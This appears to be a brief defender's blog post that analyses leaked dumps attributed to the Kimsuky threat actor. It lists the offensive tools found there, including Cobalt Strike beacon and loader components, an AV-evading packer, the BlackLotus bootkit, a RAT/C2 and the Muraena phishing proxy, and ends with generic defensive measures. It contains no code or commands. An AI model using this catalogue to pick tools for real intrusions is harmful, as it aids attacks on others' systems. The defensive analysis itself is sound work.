State-Linked Hacker Toolset Analysis & Defense Blueprint
Background: Recently, some unknown specialists uploaded several dumps from servers that, according to their claims, are related to Kimsuky (State sponsored) systems. As cybersecurity defenders, we need to analyze all these dumps to understand the threat actor’s digital weapons and exploits. Based on this analysis, we can implement appropriate defense layers to protect against such attacks.
Toolset used by that threat actors: This part is particularly interesting because, if you have dumps of all the systems, as a cybersecurity professional you can first examine their bash history to understand user activity. Based on this search, I have identified the toolsets that the threat actors have used or are currently using.
- BetterOCR : This tools is helping to translate pdf and ocr components into different languages
- IntelliJIdea2018.3 :
Ide for ongoing work
- minibeacon :
http(s) beacon for Cobalt Strike
-TitanLdr :
Loader written in C and assembly for Cobalt Strike. Redirects DNS Beacon over DoH
- proxyres : C lang library for proxy
- Custom-PE-Packer : Tool to evade from AV detection
- blacklotus : A well known UEFI bootkit
- RATandC2 : C2 and Rat coplex tool
- Cobalt strike component
- Muraena : tool for phishing and post phishing proxy activities
- Mettle & Winrar old exploit
To protect environment from such threat need to execute noted activity
- EDR/XDR installation on all server
- Enable Secure Boot and force firmware update on all machines
- Implement IDS/IPS on network layer
- Phishing & Web Protection & Employees awareness training
- Threat hunting